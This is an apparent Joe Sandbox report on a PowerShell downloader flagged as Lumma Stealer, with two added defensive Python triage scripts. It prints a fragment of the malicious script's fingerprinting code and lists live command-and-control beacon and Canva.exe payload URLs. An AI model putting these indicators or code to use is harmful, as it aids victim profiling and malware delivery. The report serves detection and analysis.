The two Cloudflare addresses front a public CDN and a public IP-lookup service and are shared with a large amount of benign traffic; the indicators specific to this sample are 185.211.7.193 (goutteuy.com, the Canva.exe payload host) and 91.206.178.120 port 5001 (the script_start/script_end check-in server).
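The URL tables above expose the sample's check-in format: a public-IP lookup via api.ipify.org, a GET to /script_start on 91.206.178.120:5001 carrying ip, os, memory and a random_number token, a fetch of Canva.exe from a WordPress plugin images directory, and a GET to /script_end carrying the same token. The Python below is an added example for triaging a proxy or sandbox URL list for that pattern; it is not part of the Joe Sandbox report or of the sample. The URLs it parses are the ones listed in this report, embedded as constructed input so nothing is fetched. The IP-lookup host list and the regular expression for an executable under a web-asset directory are assumptions chosen for this example, not indicators taken from the report.

```python
"""Triage URL lists for the script_start/script_end beacon pattern seen above.

Added example, not code from the report or the sample. Parses URLs only;
no network access. Host list and regex below are this example's assumptions.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample input: the URLs the report lists for this sample plus the
# two benign fetches it also made (bootstrap CSS, ipify lookup).
SAMPLE_URLS = [
    "http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&memory=4&random_number=66350",
    "https://goutteuy.com/wp-content/plugins/header-footer/images/Canva.exe",
    "http://91.206.178.120:5001/script_end?random_number=66350",
    "http://api.ipify.org/",
    "https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css",
]

# Beacon endpoints and the host-fingerprint keys the report's URLs carry.
BEACON_PATHS = {"/script_start": "beacon_start", "/script_end": "beacon_end"}
FINGERPRINT_KEYS = {"ip", "os", "memory", "random_number"}
# Assumption for this example: public IP-lookup services worth flagging.
IP_LOOKUP_HOSTS = {"api.ipify.org"}
# Assumption for this example: an .exe served from a web-asset directory.
EXE_UNDER_WEB_ASSET_DIR = re.compile(r"/(images|uploads|plugins)/.*\.exe$", re.I)


def classify(url):
    """Return (kind, details) for one URL, judged from the URL alone."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    port = parts.port or (443 if parts.scheme == "https" else 80)
    # parse_qs percent-decodes values, so "Microsoft%20Windows" becomes readable.
    query = {k: v[0] for k, v in parse_qs(parts.query).items()}
    details = {"host": host, "port": port, "query": query}

    if parts.path in BEACON_PATHS:
        details["fingerprint_keys"] = sorted(FINGERPRINT_KEYS & set(query))
        # Plain HTTP on a port other than 80 is what the report calls a
        # "known network protocol on a non-standard port".
        details["non_standard_port"] = parts.scheme == "http" and port != 80
        return BEACON_PATHS[parts.path], details
    if host in IP_LOOKUP_HOSTS:
        return "ip_lookup", details
    if EXE_UNDER_WEB_ASSET_DIR.search(parts.path):
        return "payload_download", details
    return "benign", details


def correlate(urls):
    """Pair script_start and script_end beacons that share a random_number token.

    Returns {token: {"c2": "host:port", "start": url, "end": url, "victim": {...}}}.
    """
    sessions = {}
    for url in urls:
        kind, d = classify(url)
        if not kind.startswith("beacon_"):
            continue
        token = d["query"].get("random_number")
        s = sessions.setdefault(
            token, {"c2": f'{d["host"]}:{d["port"]}', "start": None, "end": None, "victim": {}}
        )
        if kind == "beacon_start":
            s["start"] = url
            # The start beacon leaks the victim's public IP, OS string and RAM size.
            s["victim"] = {k: d["query"][k] for k in ("ip", "os", "memory") if k in d["query"]}
        else:
            s["end"] = url
    return sessions


def triage(urls):
    """Return (kind, url) for every URL that is not classified as benign."""
    return [(classify(u)[0], u) for u in urls if classify(u)[0] != "benign"]


if __name__ == "__main__":
    for kind, url in triage(SAMPLE_URLS):
        print(f"{kind:17} {url}")
    for token, s in correlate(SAMPLE_URLS).items():
        print(f"session {token}: c2={s['c2']} victim={s['victim']} complete={bool(s['start'] and s['end'])}")
```

Run against the report's URLs this yields four non-benign entries and one complete session keyed by token 66350 on 91.206.178.120:5001. Keying on the random_number rather than on the host is deliberate: if the operator rotates the check-in server, the start and end of one run still pair up as long as the token format survives.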
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1617745
Start date and time: 2025-02-18 08:25:03 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 0s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 15
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Pmw24ExIdx.ps1 (renamed because the original name is a hash value)
Original Sample Name: 6b61934dea7d3b16f46b12dc810972a58e4278632ad39abdbf79801fca7a4875.ps1
Detection: MAL
Classification: mal76.troj.winPS1@3/7@4/4
EGA Information: Failed
HCA Information:
  • Successful, ratio: 93%
  • Number of executed functions: 41
  • Number of non-executed functions: 8
Cookbook Comments:
  • Found application associated with file extension: .ps1
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 142.250.186.138, 142.250.184.238, 13.107.246.45, 52.149.20.212, 40.69.42.241, 20.109.210.53
  • Excluded domains from analysis (whitelisted): fonts.googleapis.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com, www.google-analytics.com
  • Execution Graph export aborted for target powershell.exe, PID 7236 because it is empty
  • Not all processes were analyzed; the report is missing behavior information
  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Note that the analysis ended by timeout after five minutes and that EGA failed; combined with the sample's long sleeps, the behaviour recorded here may stop short of what the script does on a live host.

Timeline (Time | Type | Description):
  02:25:56 | API Interceptor | 41x Sleep call for process: powershell.exe modified
Context: other analyses that contacted the same IPs (Associated sample name / URL | Detection | Threat name | Context):
  104.18.11.207
    http://googlle.com | malicious | Unknown | maxcdn.bootstrapcdn.com/font-awesome/4.1.0/fonts/fontawesome-webfont.woff?v=4.1.0
    https://city-of-goodyear.webnode.page/ | malicious | Unknown | maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap-theme.min.css
    http://Voyages.CNTraveler.com | malicious | Unknown | maxcdn.bootstrapcdn.com/font-awesome/4.3.0/fonts/fontawesome-webfont.woff2?v=4.3.0
    http://185.67.82.114 | malicious | Unknown | maxcdn.bootstrapcdn.com/bootstrap/3.2.0/js/bootstrap.min.js
    SecuriteInfo.com.Exploit.Siggen3.17149.4489.xls | malicious | Unknown | netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
    SecuriteInfo.com.Exploit.Siggen3.17149.3543.xls | malicious | Unknown | netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
    SecuriteInfo.com.Exploit.Siggen3.17149.3543.xls | malicious | Unknown | netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
    SecuriteInfo.com.Exploit.Siggen3.17149.24514.xls | malicious | Unknown | netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
    SecuriteInfo.com.Exploit.Siggen3.17149.12724.xls | malicious | Unknown | netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
    SecuriteInfo.com.Exploit.Siggen3.17149.8245.xls | malicious | Unknown | netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
  104.26.12.205
    DeepLauncher.exe | malicious | Unknown | api.ipify.org/
    [Huawei] Contract for YouTube partners.exe | malicious | Unknown | api.ipify.org/
    NexoPack Setup 1.0.0.exe | malicious | Unknown | api.ipify.org/
    NexoPack Setup 1.0.0.exe | malicious | Unknown | api.ipify.org/
    lO5lV39HDj.exe | malicious | DarkTortilla, Quasar | api.ipify.org/
    SpacesVoid Setup 1.0.0.exe | malicious | Unknown | api.ipify.org/
    55ryoipjfdr.exe | malicious | Trickbot | api.ipify.org/
    Yoranis Setup.exe | malicious | Unknown | api.ipify.org/
    RtU8kXPnKr.exe | malicious | Quasar | api.ipify.org/
    jgbC220X2U.exe | malicious | Unknown | api.ipify.org/?format=text

Context: other analyses that contacted the same domains (Associated sample name / URL | Detection | Threat name | Context):
  maxcdn.bootstrapcdn.com
    Jim.flanigan Open annual plan_Catalinamarketing.pdf | malicious | HTMLPhisher | 104.18.11.207
    2025 Q1 Staff Pay Adjustment-Handbook.pdf | malicious | HTMLPhisher | 104.18.11.207
    Attach2.pdf | malicious | HTMLPhisher | 104.18.11.207
    Attach1.htm | malicious | HTMLPhisher | 104.18.11.207
    2025 Q1 Staff Pay Adjustment-Handbook.pdf | malicious | HTMLPhisher | 104.18.10.207
    Final_Draft_with_without_Removal_Depreciation_Report.htm | malicious | HTMLPhisher | 104.18.10.207
    https://claiim-hadiaah4.resminiid.net/ | malicious | Unknown | 104.18.10.207
    https://xsin.it/Pemenang-Giveaway | malicious | Unknown | 104.18.10.207
    GasTechnologyPartnership.pdf | malicious | HTMLPhisher | 104.18.11.207
    https://zxx-ingkx-pylters.cz1.us.kg/ | malicious | Unknown | 104.18.10.207
  api.ipify.org
    SecuriteInfo.com.Win32.Evo-gen.5457.19170.exe | malicious | AgentTesla, GuLoader | 104.26.12.205
    LmIclOjfqc.exe | malicious | AgentTesla | 104.26.13.205
    http://account-5036237.kurhaus-steina.com/ | malicious | Unknown | 104.26.12.205
    http://account-5078804.kurhaus-steina.com/ | malicious | Unknown | 104.26.13.205
    https://business.accounts-security-center-overview.com/case | malicious | Unknown | 172.67.74.152
    https://s3.us-east-2.amazonaws.com/tril-laxy-glow/UwyHSGw.html?EMAIL=mohallstaff@mohmuseum.org | malicious | HTMLPhisher | 172.67.74.152
    https://s3.us-east-2.amazonaws.com/tril-laxy-glow/UwyHSGw.html?EMAIL=mohallstaff@mohmuseum.org | malicious | HTMLPhisher | 104.26.12.205
    DeepLauncher.exe | malicious | Unknown | 104.26.12.205
    [Huawei] Contract for YouTube partners.exe | malicious | Unknown | 104.26.12.205
    Editing.exe | malicious | Unknown | 172.67.74.152

Context: other analyses that contacted the same ASNs (Associated sample name / URL | Detection | Threat name | Context):
  CLOUDFLARENETUS
    Commercial Invoice Confirmation-1132346.vbs | malicious | Unknown | 104.21.16.1
    jjmax il.vbs | malicious | Snake Keylogger, VIP Keylogger | 104.21.64.1
    Payment_Activity_0104_2025-2-17.vbs | malicious | Unknown | 104.22.74.216
    Payment_Activity_0104_2025-2-17.vbs | malicious | Unknown | 172.67.74.232
    Payment_Activity_0104_2025-2-17.vbs | malicious | Unknown | 104.18.27.193
    FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe | malicious | DBatLoader, Snake Keylogger, VIP Keylogger | 104.21.32.1
    Payment_Activity_0079_2025-2-17.vbs | malicious | Unknown | 104.18.27.193
    Payment_Activity_0079_2025-2-17.vbs | malicious | Unknown | 172.67.23.234
    Payment_Activity_0079_2025-2-17.vbs | malicious | Unknown | 104.18.66.57
    payment1.js | malicious | FormBook | 104.21.16.1
  QUICKPACKETUS
    INVOICE-No96322.pdf.exe | malicious | Remcos | 185.213.83.33
    Bukti_Transfer...pdf.exe | malicious | Remcos | 185.213.83.33
    Hilix.sh4.elf | malicious | Mirai | 185.216.200.208
    SSA-2025.exe | malicious | ScreenConnect Tool | 193.26.115.242
    https://www.v1.bgmi-event.freewebhostmost.com/ | malicious | Unknown | 66.78.59.15
    https://v1.bgmi-event.freewebhostmost.com/ | malicious | Unknown | 66.78.59.15
    nabspc.elf | malicious | Unknown | 104.166.110.66
    G1B8T38x7G.elf | malicious | Unknown | 203.159.95.7
    test.exe | malicious | Discord Token Stealer | 167.88.173.11
    http://demfre.com/lact/nhuo/onaoPJocCsxs7r0YZwFMZ/c3VzYW4ua2FsY3JvZnRAc3RhdGUubmUuZ292 | malicious | HTMLPhisher | 173.46.80.217
                                              CLOUDFLARENETUSCommercial Invoice Confirmation-1132346.vbsGet hashmaliciousUnknownBrowse
                                              • 104.21.16.1
                                              jjmax il.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 104.21.64.1
                                              Payment_Activity_0104_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                              • 104.22.74.216
                                              Payment_Activity_0104_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                              • 172.67.74.232
                                              Payment_Activity_0104_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                              • 104.18.27.193
                                              FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeGet hashmaliciousDBatLoader, Snake Keylogger, VIP KeyloggerBrowse
                                              • 104.21.32.1
                                              Payment_Activity_0079_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                              • 104.18.27.193
                                              Payment_Activity_0079_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                              • 172.67.23.234
                                              Payment_Activity_0079_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                              • 104.18.66.57
                                              payment1.jsGet hashmaliciousFormBookBrowse
                                              • 104.21.16.1
                                              ARTNET2PL4Osfx7gnSx.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                              • 185.104.113.237
                                              fqJIOoSp5U.dllGet hashmaliciousUnknownBrowse
                                              • 91.206.178.125
                                              QZzvG5G6VE.exeGet hashmaliciousStealcBrowse
                                              • 91.206.178.118
                                              mrkjKujfkP.exeGet hashmaliciousStealcBrowse
                                              • 91.206.178.118
                                              vR19oQpY8c.exeGet hashmaliciousStealcBrowse
                                              • 91.206.178.118
                                              sql.tmp.dll.dllGet hashmaliciousUnknownBrowse
                                              • 91.206.178.125
                                              UrQrIdRfCg.exeGet hashmaliciousUnknownBrowse
                                              • 185.104.112.62
                                              http://tldbonak.comGet hashmaliciousUnknownBrowse
                                              • 91.206.178.97
                                              7ECHtNYRdu.exeGet hashmaliciousVidarBrowse
                                              • 185.104.114.24
                                              Wi50Ux1Ats.exeGet hashmaliciousVidarBrowse
                                              • 185.104.114.24
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | Commercial Invoice Confirmation-1132346.vbs | malicious | Unknown | 185.211.7.193
                                 | jjmax il.vbs | malicious | Snake Keylogger, VIP Keylogger | 185.211.7.193
                                 | Payment_Activity_0104_2025-2-17.vbs | malicious | Unknown | 185.211.7.193
                                 | Payment_Activity_0104_2025-2-17.vbs | malicious | Unknown | 185.211.7.193
                                 | Payment_Activity_0104_2025-2-17.vbs | malicious | Unknown | 185.211.7.193
                                 | FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe | malicious | DBatLoader, Snake Keylogger, VIP Keylogger | 185.211.7.193
                                 | Payment_Activity_0079_2025-2-17.vbs | malicious | Unknown | 185.211.7.193
                                 | Payment_Activity_0079_2025-2-17.vbs | malicious | Unknown | 185.211.7.193
                                 | Payment_Activity_0079_2025-2-17.vbs | malicious | Unknown | 185.211.7.193
                                 | Rooming list.js | malicious | Remcos | 185.211.7.193
37f463bf4616ecd445d4a1937da06e19 | nDHL_CUSTOM_CLEARANCE_FORM_3409249_pdf.exe | malicious | GuLoader, MassLogger RAT | 104.18.11.207
                                 | DHL AWB Document_pdf.exe | malicious | GuLoader, Snake Keylogger | 104.18.11.207
                                 | TxTPu961er.exe | malicious | Amadey, RedLine, Stealc | 104.18.11.207
                                 | Xw9oZv75Ze.exe | malicious | Amadey, LummaC Stealer, Stealc, Vidar | 104.18.11.207
                                 | hHtR1O06GH.exe | malicious | Amadey, Healer AV Disabler, LummaC Stealer, Stealc, Vidar | 104.18.11.207
                                 | #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f.exe | malicious | GhostRat | 104.18.11.207
                                 | SecuriteInfo.com.Win32.Evo-gen.5457.19170.exe | malicious | AgentTesla, GuLoader | 104.18.11.207
                                 | SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe | malicious | GuLoader | 104.18.11.207
                                 | SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe | malicious | GuLoader | 104.18.11.207
                                 | 1638743478-734687553.8.exe | malicious | Unknown | 104.18.11.207
                                              No context
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):2704
                                              Entropy (8bit):5.4203953118757235
                                              Encrypted:false
                                              SSDEEP:48:AcYNSU4y4RY5mFoUeW+mZ9tK8NTXGiR80xnqLQkyUbaImx10ln0z96JAwqgt:AZkHyIYgKLmZ2KTXGibBkyGaImM0h6JZ
                                              MD5:D1A53037AF541D0457C574C3811CA74B
                                              SHA1:8FD040C0759CBA56D49F79566D91056A893EC9BA
                                              SHA-256:E92668857F2E70EA1B041E3274C8207DBBA5051A7F17F6C298D4420EA432E1B4
                                              SHA-512:97C5F0188188CA5757B23FDF1AF071C6179D467056EB325091573E4906A633DEFC394435EC2AB98FFE4E5E41E75F961B93046F50FD3F9DEBDAD22EB1543456AB
                                              Malicious:false
                                              Reputation:low
                                              Preview:@...e................................................@..........X................$.....K.sG.<p..a.......Microsoft.Management.Infrastructure.CimCmdlets..H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<...............i..VdqF...|...........System.Configuration<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerS
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):6225
                                              Entropy (8bit):3.7429548255148086
                                              Encrypted:false
                                              SSDEEP:96:4Vy+CCHrjkvhkvCCtVjS5LKHTmS5LKHT2:Cy+trlS5L3S5Lp
                                              MD5:1CC7C658CE35CAFAB3115B5A700B113E
                                              SHA1:B2E28ACDF83AA6B7E6D7D03C8775D55EF0743113
                                              SHA-256:75AF132431C69308527B7B84609B6C4F465BE2DAD4820961D07B404BF15A16B8
                                              SHA-512:35E1720551514DD6431AD1954A7C86F83251F4309F79AF672FBC4759C07F0B491B36F3B8772FF03EC5FE7EC298A9FED0129A5D4753F6541B4ED7B0FBA8562429
                                              Malicious:false
                                              Preview:...................................FL..................F.".. .....*_....(.._...z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_.....hU...^.?Y.......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=RZ6;..........................3*N.A.p.p.D.a.t.a...B.V.1.....RZ9;..Roaming.@......EW.=RZ9;.......................... GU.R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=RZ6;..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=RZ6;...........................O).W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=RZ6;....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=RZ6;....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=EW.=....9...........
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):6225
                                              Entropy (8bit):3.7429548255148086
                                              Encrypted:false
                                              SSDEEP:96:4Vy+CCHrjkvhkvCCtVjS5LKHTmS5LKHT2:Cy+trlS5L3S5Lp
                                              MD5:1CC7C658CE35CAFAB3115B5A700B113E
                                              SHA1:B2E28ACDF83AA6B7E6D7D03C8775D55EF0743113
                                              SHA-256:75AF132431C69308527B7B84609B6C4F465BE2DAD4820961D07B404BF15A16B8
                                              SHA-512:35E1720551514DD6431AD1954A7C86F83251F4309F79AF672FBC4759C07F0B491B36F3B8772FF03EC5FE7EC298A9FED0129A5D4753F6541B4ED7B0FBA8562429
                                              Malicious:false
                                              Preview:...................................FL..................F.".. .....*_....(.._...z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_.....hU...^.?Y.......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=RZ6;..........................3*N.A.p.p.D.a.t.a...B.V.1.....RZ9;..Roaming.@......EW.=RZ9;.......................... GU.R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=RZ6;..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=RZ6;...........................O).W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=RZ6;....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=RZ6;....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=EW.=....9...........
                                              File type:ASCII text, with very long lines (703), with no line terminators
                                              Entropy (8bit):5.389695953286014
                                              TrID:
                                                File name:Pmw24ExIdx.ps1
                                                File size:703 bytes
                                                MD5:9d4b0d4215aba4d887790a8a959eb119
                                                SHA1:7a2607ff3d039b73a913381daf2df94c58e67a61
                                                SHA256:6b61934dea7d3b16f46b12dc810972a58e4278632ad39abdbf79801fca7a4875
                                                SHA512:f19a04b10064f2c5115428a8fbd12fc588a30c53d2d7c22bd906fb183e9db56ddcc45dafd39d58e0cd70f87a1bdcb1349daba639281e38686870de0e64d7f0b4
                                                SSDEEP:12:WVBuiG3wEQ2aHWj25ioWAR+wpbZ6l/6gLhYdGHAyG35+9zIy5hu1M4AGs6Y:BP3wEqHu25xxUlpLhNHAf3gH5htORY
                                                TLSH:7601C031733C428583D5C860B4B9B712D0576B40A55EEDFD76FC2001C7832E23D54918
                                                File Content Preview:$randomNumber=Get-Random -Minimum 10000 -Maximum 99999; $ipAddress=(Invoke-WebRequest -Uri 'http://api.ipify.org').Content; $osVersion=[System.Environment]::OSVersion.VersionString; $memory=[math]::round((Get-CimInstance -ClassName Win32_ComputerSystem).T
                                                Icon Hash:3270d6baae77db44
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-02-18T08:25:58.366209+0100 | 1810000 | Joe Security ANOMALY Windows PowerShell HTTP activity | 2 | 192.168.2.7 | 49699 | 104.26.12.205 | 80 | TCP
2025-02-18T08:26:00.782059+0100 | 2860232 | ETPRO MALWARE Observed Lumma Stealer CnC Checkin (GET) | 1 | 192.168.2.7 | 49700 | 91.206.178.120 | 5001 | TCP
2025-02-18T08:26:00.782059+0100 | 1810000 | Joe Security ANOMALY Windows PowerShell HTTP activity | 2 | 192.168.2.7 | 49700 | 91.206.178.120 | 5001 | TCP
2025-02-18T08:26:00.782066+0100 | 2860233 | ETPRO MALWARE Observed Lumma Stealer CnC Response (Script Start Confirmation) | 1 | 91.206.178.120 | 5001 | 192.168.2.7 | 49700 | TCP
2025-02-18T08:26:01.893635+0100 | 1810000 | Joe Security ANOMALY Windows PowerShell HTTP activity | 2 | 192.168.2.7 | 49701 | 185.211.7.193 | 443 | TCP
2025-02-18T08:26:01.893635+0100 | 2021697 | ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious | 1 | 192.168.2.7 | 49701 | 185.211.7.193 | 443 | TCP
2025-02-18T08:26:03.061005+0100 | 1810000 | Joe Security ANOMALY Windows PowerShell HTTP activity | 2 | 192.168.2.7 | 49705 | 91.206.178.120 | 5001 | TCP
2025-02-18T08:26:03.061005+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49705 | 91.206.178.120 | 5001 | TCP
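The alert rows and the packet timeline are more useful once they are folded together per remote endpoint: which hosts the VM contacted, in what order, on which ports, how many TCP sessions each saw, and which Suricata signatures attach to each. The script below is an added triage helper, not part of the Joe Sandbox report or of the analysed sample. Its input rows are constructed from the two tables on this page (a subset, re-delimited so the fused columns parse); that 192.168.2.7 is the analysis VM and that CET here means UTC+01:00 are assumptions read off the report's own columns.

```python
# Added triage helper (not part of the Joe Sandbox report): correlate the
# Suricata alerts with the TCP packet timeline and rank remote endpoints.
import re
from collections import OrderedDict, namedtuple
from datetime import datetime, timedelta, timezone

SANDBOX_HOST = "192.168.2.7"          # assumption: the analysis VM in this report
STANDARD_PORTS = {80, 443}            # anything else is flagged as non-standard
CET = timezone(timedelta(hours=1))    # assumption: CET = UTC+01:00 (matches the +0100 alert stamps)

Alert = namedtuple("Alert", "ts sid signature severity src sport dst dport")
Packet = namedtuple("Packet", "ts sport dport src dst")

# Constructed input: alert rows from the report's table, re-keyed with '|' so
# the columns parse unambiguously. Suricata severity 1 is the highest priority.
ALERTS_TXT = """\
2025-02-18T08:25:58.366209+0100|1810000|Joe Security ANOMALY Windows PowerShell HTTP activity|2|192.168.2.7|49699|104.26.12.205|80|TCP
2025-02-18T08:26:00.782059+0100|2860232|ETPRO MALWARE Observed Lumma Stealer CnC Checkin (GET)|1|192.168.2.7|49700|91.206.178.120|5001|TCP
2025-02-18T08:26:00.782066+0100|2860233|ETPRO MALWARE Observed Lumma Stealer CnC Response (Script Start Confirmation)|1|91.206.178.120|5001|192.168.2.7|49700|TCP
2025-02-18T08:26:01.893635+0100|2021697|ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious|1|192.168.2.7|49701|185.211.7.193|443|TCP
2025-02-18T08:26:03.061005+0100|2803274|ETPRO MALWARE Common Downloader Header Pattern UH|2|192.168.2.7|49705|91.206.178.120|5001|TCP
"""

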